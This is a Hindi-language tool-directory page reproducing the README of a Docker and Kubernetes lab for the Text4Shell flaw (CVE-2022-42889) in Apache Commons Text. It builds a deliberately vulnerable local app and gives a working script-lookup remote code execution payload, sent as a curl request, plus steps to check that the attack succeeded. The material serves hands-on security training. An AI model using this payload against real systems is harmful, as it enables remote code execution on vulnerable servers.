Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
text4shell-cve-2022-42889 — CVE-2022-42889 के लिए Kubernetes Lab | Kitploit
उपकरण/GitHubGitHub/devenes/text4shell-cve-2022-42889
कंटेनर सुरक्षाभेद्यता विश्लेषणवेब एप्लिकेशन शोषणक्लाउड सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHubdevenes/text4shell-cve-2022-42889

text4shell-cve-2022-42889

CVE-2022-42889 के लिए Kubernetes Lab

रिपॉजिटरी देखें
2183 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Text4Shell CVE-2022-42889

CVE-2022-42889 के लिए Docker लैब

आप या तो Docker इमेज को स्थानीय रूप से बना सकते हैं या Docker Hub से इमेज पुल करके कंटेनर चला सकते हैं।

रेपो क्लोन करें

git clone https://github.com/devenes/text4shell-cve-2022-42889.git

Docker इमेज को स्थानीय रूप से बनाएं

docker build --tag=text4shell .

Docker कंटेनर चलाएं

docker run -d --rm -p 8080:8080 text4shell

या Docker Hub से इमेज पुल करें और कंटेनर चलाएं

docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0

search पैरामीटर में एक स्ट्रिंग पास करके ऐप का परीक्षण करें:

curl http://localhost/text4shell/attack?search=<anything>
  • हमला ${prefix:name} के रूप में एक स्ट्रिंग पास करके किया जा सकता है, जहां प्रीफिक्स उपर्युक्त लुकअप है:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

curl का उपयोग करके हमला करें:

curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
  • आप dns या url प्रीफिक्स का उपयोग करके भी प्रयास कर सकते हैं

कंटेनर आईडी प्राप्त करें

docker container ls

कंटेनर के अंदर जाएं

docker exec -it <container_id> bash

जांचें कि RCE हमला सफल रहा या नहीं

  • आपको /tmp निर्देशिका में foo नामक एक फ़ाइल बनी हुई दिखनी चाहिए:
ls /tmp/

आप निम्न कमांड चलाकर कंटेनर रोक सकते हैं

docker container stop <container_id>

CVE-2022-42889 के लिए Kubernetes लैब

डायरेक्टरी को kubernetes में बदलें और README.md फ़ाइल में दिए गए निर्देशों का पालन करें।

cd kubernetes

kind क्लस्टर बनाएं

kind create cluster --config kind-config.yaml

क्लस्टर में कमजोर ऐप डिप्लॉय करें

kubectl apply -f deployment.yaml

ऐप को एक्सपोज़ करने के लिए एक सर्विस बनाएं

kubectl apply -f service.yaml

curl का उपयोग करके कमजोर ऐप पर हमला करें

curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"

kubectl get pods का उपयोग करके पॉड का नाम प्राप्त करें

kubectl get pods

kubectl exec का उपयोग करके पॉड के अंदर जाएं

kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash

जांचें कि हमला सफल रहा या नहीं

ls /tmp/ | grep foo

आप मेरे Udemy कोर्स में यहां विस्तृत ट्यूटोरियल पा सकते हैं


संदर्भ:

  • https://github.com/karthikuj/cve-2022-42889-text4shell-docker
  • https://www.docker.com/blog/security-advisory-cve-2022-42889-text4shell/
  • https://unifiedguru.com/security-advisory-cve-2022-42889-text4shell-docker/
  • https://medium.com/mii-cybersec/cve-2022-42889-text4shell-vulnerability-17b703a48dcd
टूल डाउनलोड करें